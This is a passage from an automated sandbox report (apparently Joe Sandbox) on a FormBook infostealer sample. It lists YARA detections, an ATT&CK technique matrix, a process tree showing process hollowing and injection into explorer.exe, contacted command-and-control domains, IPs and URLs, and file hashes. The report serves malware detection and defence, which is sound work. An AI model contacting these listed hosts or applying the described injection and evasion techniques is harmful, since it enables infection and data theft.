            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information:

            Yara detected FormBook
            Source: Yara match, File source: 3.2.iAuPyHuUkk.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 3.2.iAuPyHuUkk.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 0.2.iAuPyHuUkk.exe.45ef360.3.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 0000000D.00000002.619163959.0000000002FE0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000003.00000002.455602320.0000000001930000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match, File source: 0000000D.00000002.619272890.0000000003010000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match, File source: 00000003.00000002.454131267.00000000015D0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000000.00000002.371245810.00000000043C9000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match, File source: 00000005.00000000.400507122.00000000075B9000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000005.00000000.421546178.00000000075B9000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match, File source: 0000000D.00000002.617454019.00000000009B0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000003.00000002.453689507.0000000000400000.00000040.00000001.sdmp, type: MEMORY

            Remote Access Functionality:

            Yara detected FormBook

            Mitre Att&ck Matrix

            Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
            Valid Accounts | Shared Modules 1 | Path Interception | Process Injection 512 | Masquerading 1 | OS Credential Dumping | Security Software Discovery 221 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
            Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools 1 | LSASS Memory | Process Discovery 2 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
            Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion 31 | Security Account Manager | Virtualization/Sandbox Evasion 31 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
            Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection 512 | NTDS | Remote System Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 12 | SIM Card Swap | | Carrier Billing Fraud
            Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Obfuscated Files or Information 3 | LSA Secrets | System Information Discovery 112 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
            Replication Through Removable Media | Launchd | Rc.common | Rc.common | Software Packing 13 | Cached Domain Credentials | System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
            External Remote Services | Scheduled Task | Startup Items | Startup Items | File Deletion 1 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact

            Behavior Graph

            Behavior Graph ID: 501991, Sample: iAuPyHuUkk, Startdate: 13/10/2021, Architecture: WINDOWS, Score: 100

            Top-level signatures:
            • Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
            • Found malware configuration
            • Malicious sample detected (through community Yara rule)
            • 7 other signatures

            Process tree:
            • iAuPyHuUkk.exe (started)
                Dropped file: C:\Users\user\AppData\...\iAuPyHuUkk.exe.log, ASCII
                Signature: Tries to detect virtualization through RDTSC time measurements
              • iAuPyHuUkk.exe (started)
                  Signature: Modifies the context of a thread in another process (thread injection)
                  Signature: Maps a DLL or memory area into another process
                  Signature: Sample uses process hollowing technique
                  Signature: Queues an APC in another process (thread injection)
                • explorer.exe (injected)
                    DNS/IP: www.cyebang.com 154.216.110.149, 49827, 80 POWERLINE-AS-APPOWERLINEDATACENTERHK Seychelles
                    DNS/IP: www.xn--aprendes-espaol-brb.com 217.160.0.226, 49826, 80 ONEANDONE-ASBrauerstrasse48DE Germany
                    DNS/IP: 5 other IPs or domains
                    Signature: System process connects to network (likely due to code injection or exploit)
                  • control.exe (started)
                      Signature: Self deletion via cmd delete
                      Signature: Modifies the context of a thread in another process (thread injection)
                      Signature: Maps a DLL or memory area into another process
                      Signature: Tries to detect virtualization through RDTSC time measurements
                    • cmd.exe (started)
                      • conhost.exe (started)
                  • autofmt.exe (started)


            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            Source | Detection | Scanner | Label
            iAuPyHuUkk.exe | 15% | ReversingLabs |

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            Source | Detection | Scanner | Label
            3.2.iAuPyHuUkk.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

            Domains

            No Antivirus matches

            URLs


            Domains and IPs

            Contacted Domains

            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            www.vintagepaseo.com | 208.91.197.27 | true | true | | unknown
            windowsupdate.s.llnwi.net | 178.79.242.0 | true | false | | unknown
            www.cyebang.com | 154.216.110.149 | true | true | | unknown
            www.xn--aprendes-espaol-brb.com | 217.160.0.226 | true | true | | unknown
            www.brandmty.net | unknown | unknown | true | | unknown
            www.districonio.com | unknown | unknown | true | | unknown
            www.iphone13promax.design | unknown | unknown | true | | unknown
            www.umdasch-lagertechnik.com | unknown | unknown | true | | unknown

                            Contacted URLs

                            Name | Malicious | Antivirus Detection | Reputation
                            http://www.cyebang.com/mexq/?e66HNDO=g6L0/Z2eA1jwRGo1l6rXBhzWGtzMcF3Ol1vrZIbNMV/6CHuR9YyStXwolwULrpYmw34wy4pkGQ==&6lux=TrTPmvux5 | true | Avira URL Cloud: malware | unknown
                            http://www.vintagepaseo.com/mexq/?e66HNDO=NdiAijP1TUDTbxv+UVf96WWBcfe2HF0RhGf6TXdRPwqQZT7SHaZsoP4NORlVjEEjxsHi13Lz5g==&6lux=TrTPmvux5 | true | Avira URL Cloud: safe | unknown
                            http://www.xn--aprendes-espaol-brb.com/mexq/?e66HNDO=aPMuX7G1Ot9XJXghMAabXwwkzBWzprGcmmQ5cfrgMP5E/C43hf1Uz5bqYekFv+cUss1JtU0p5g==&6lux=TrTPmvux5 | true | Avira URL Cloud: safe | unknown

                            URLs from Memory and Binaries


                                                            Contacted IPs

                                                            Public

                                                            IP | Domain | Country | ASN | ASN Name | Malicious
                                                            217.160.0.226 | www.xn--aprendes-espaol-brb.com | Germany | 8560 | ONEANDONE-ASBrauerstrasse48DE | true
                                                            154.216.110.149 | www.cyebang.com | Seychelles | 132839 | POWERLINE-AS-APPOWERLINEDATACENTERHK | true
                                                            208.91.197.27 | www.vintagepaseo.com | Virgin Islands (BRITISH) | 40034 | CONFLUENCE-NETWORK-INCVG | true

                                                            General Information

                                                            Joe Sandbox Version:33.0.0 White Diamond
                                                            Analysis ID:501991
                                                            Start date:13.10.2021
                                                            Start time:13:36:28
                                                            Joe Sandbox Product:CloudBasic
                                                            Overall analysis duration:0h 11m 9s
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:full
                                                            Sample file name:iAuPyHuUkk (renamed file extension from none to exe)
                                                            Cookbook file name:default.jbs
                                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                            Number of analysed new started processes analysed:24
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:0
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
                                                            • HDC enabled
                                                            • AMSI enabled
                                                            Analysis Mode:default
                                                            Analysis stop reason:Timeout
                                                            Detection:MAL
                                                            Classification:mal100.troj.evad.winEXE@8/1@8/3
                                                            EGA Information:Failed
                                                            HDC Information:
                                                            • Successful, ratio: 26.8% (good quality ratio 24.7%)
                                                            • Quality average: 69.8%
                                                            • Quality standard deviation: 31.6%
                                                            HCA Information:
                                                            • Successful, ratio: 100%
                                                            • Number of executed functions: 69
                                                            • Number of non-executed functions: 95
                                                            Cookbook Comments:
                                                            • Adjust boot time
                                                            • Enable AMSI
                                                            Warnings:
                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                            • Excluded IPs from analysis (whitelisted): 95.100.218.79, 20.82.209.183, 20.54.110.249, 40.112.88.60, 2.20.178.33, 2.20.178.24, 95.100.216.89
                                                            • Excluded domains from analysis (whitelisted): iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                            • Not all processes where analyzed, report is missing behavior information
                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                            • VT rate limit hit for: /opt/package/joesandbox/database/analysis/501991/sample/iAuPyHuUkk.exe

                                                            Simulations

                                                            Behavior and APIs

                                                            Time | Type | Description
                                                            13:37:36 | API Interceptor | 1x Sleep call for process: iAuPyHuUkk.exe modified

                                                            Joe Sandbox View / Context

                                                            JA3 Fingerprints

                                                            No context

                                                            Dropped Files

                                                            No context

                                                            Created / dropped Files

                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\iAuPyHuUkk.exe.log
                                                            Process:C:\Users\user\Desktop\iAuPyHuUkk.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1308
                                                            Entropy (8bit):5.348115897127242
                                                            Encrypted:false
                                                            SSDEEP:24:MLUE4KJXE4qpE4Ks2E1qE4qpAE4Kzr7RKDE4KhK3VZ9pKhPKIE4oKFKHKorE4x88:MIHKtH2HKXE1qHmAHKzvRYHKhQnoPtH2
                                                            MD5:832D6A22CE7798D72609B9C21B4AF152
                                                            SHA1:B086DE927BFEE6039F5555CE53C397D1E59B4CA4
                                                            SHA-256:9E5EE72EF293C66406AF155572BF3B0CF9DA09CC1F60ED6524AAFD65553CE551
                                                            SHA-512:A1A70F76B98C2478830AE737B4F12507D859365F046C5A415E1EBE3D87FFD2B64663A31E1E5142F7C3A7FE9A6A9CB8C143C2E16E94C3DD6041D1CCABEDDD2C21
                                                            Malicious:true
                                                            Reputation:low
                                                            Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Deployment, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows

                                                            Static File Info

                                                            General

                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Entropy (8bit):7.507453805098472
                                                            TrID:
                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                            • Win32 Executable (generic) a (10002005/4) 49.78%
                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                            • DOS Executable Generic (2002/1) 0.01%
                                                            File name:iAuPyHuUkk.exe
                                                            File size:698880
                                                            MD5:6040407905ea1aa24dd58dc8befa4255
                                                            SHA1:96ecf27fd10a6663cbfaadb7643abeaf4061ea77
                                                            SHA256:2f2831bdecd1f925134fd944fc57f84b76ffe872e01c66f3662f1f9194a4b362
                                                            SHA512:d16e31ae6f510ab9f2f2474c064781c15e666f871a969f394f3e6590c7c1dabf19a98c62866e0342d4e6ec9cb40ab2f036c0d687c92f34df7527c340dae923f2
                                                            SSDEEP:12288:hSBIB+gqzVl16yDr67jAkWoDq5jAyWb3PnB5JRU/V18H:sBVVmEJaqdAtj/RRGV
                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....fa..............0.................. ... ....@.. ....................................@................................

                                                            File Icon

                                                            Icon Hash:d6e0ececc8e8f4cc

                                                            Static PE Info

                                                            General

                                                            Entrypoint:0x481a8a
                                                            Entrypoint Section:.text
                                                            Digitally signed:false
                                                            Imagebase:0x400000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                            DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                            Time Stamp:0x61668406 [Wed Oct 13 07:00:22 2021 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:v4.0.30319
                                                            OS Version Major:4
                                                            OS Version Minor:0
                                                            File Version Major:4
                                                            File Version Minor:0
                                                            Subsystem Version Major:4
                                                            Subsystem Version Minor:0
                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                            Entrypoint Preview

                                                            Instruction
                                                            jmp dword ptr [00402000h]
                                                            add byte ptr [eax], al

                                                            Data Directories

                                                            Name | Virtual Address | Virtual Size | Is in Section
                                                            IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_IMPORT | 0x81a38 | 0x4f | .text
                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x82000 | 0x2a838 | .rsrc
                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xae000 | 0xc | .reloc
                                                            IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                                            IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                                            Sections

                                                            Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                            .text | 0x2000 | 0x7fa90 | 0x7fc00 | False | 0.915104039261 | data | 7.86255981519 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                            .rsrc | 0x82000 | 0x2a838 | 0x2aa00 | False | 0.18847369868 | data | 5.44795610818 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .reloc | 0xae000 | 0xc | 0x200 | False | 0.044921875 | data | 0.101910425663 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                            Resources

                                                            Name | RVA | Size | Type | Language | Country
                                                            RT_ICON | 0x822e0 | 0x2762 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | |
                                                            RT_ICON | 0x84a44 | 0x10828 | dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0 | |
                                                            RT_ICON | 0x9526c | 0x94a8 | data | |
                                                            RT_ICON | 0x9e714 | 0x5488 | data | |
                                                            RT_ICON | 0xa3b9c | 0x4228 | dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 254, next used block 520093696 | |
                                                            RT_ICON | 0xa7dc4 | 0x25a8 | data | |
                                                            RT_ICON | 0xaa36c | 0x10a8 | data | |
                                                            RT_ICON | 0xab414 | 0x988 | data | |
                                                            RT_ICON | 0xabd9c | 0x468 | GLS_BINARY_LSB_FIRST | |
                                                            RT_GROUP_ICON | 0xac204 | 0x84 | data | |
                                                            RT_GROUP_ICON | 0xac288 | 0x4c | data | |
                                                            RT_VERSION | 0xac2d4 | 0x378 | data | |
                                                            RT_MANIFEST | 0xac64c | 0x1ea | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators | |

                                                            Imports

                                                            DLL | Import
                                                            mscoree.dll | _CorExeMain

                                                            Version Infos

                                                            Description | Data
                                                            Translation | 0x0000 0x04b0
                                                            LegalCopyright | Copyright Gottschalks 2011
                                                            Assembly Version | 1.0.0.0
                                                            InternalName | DictionaryEnumerat.exe
                                                            FileVersion | 1.0.0.0
                                                            CompanyName | Gottschalks
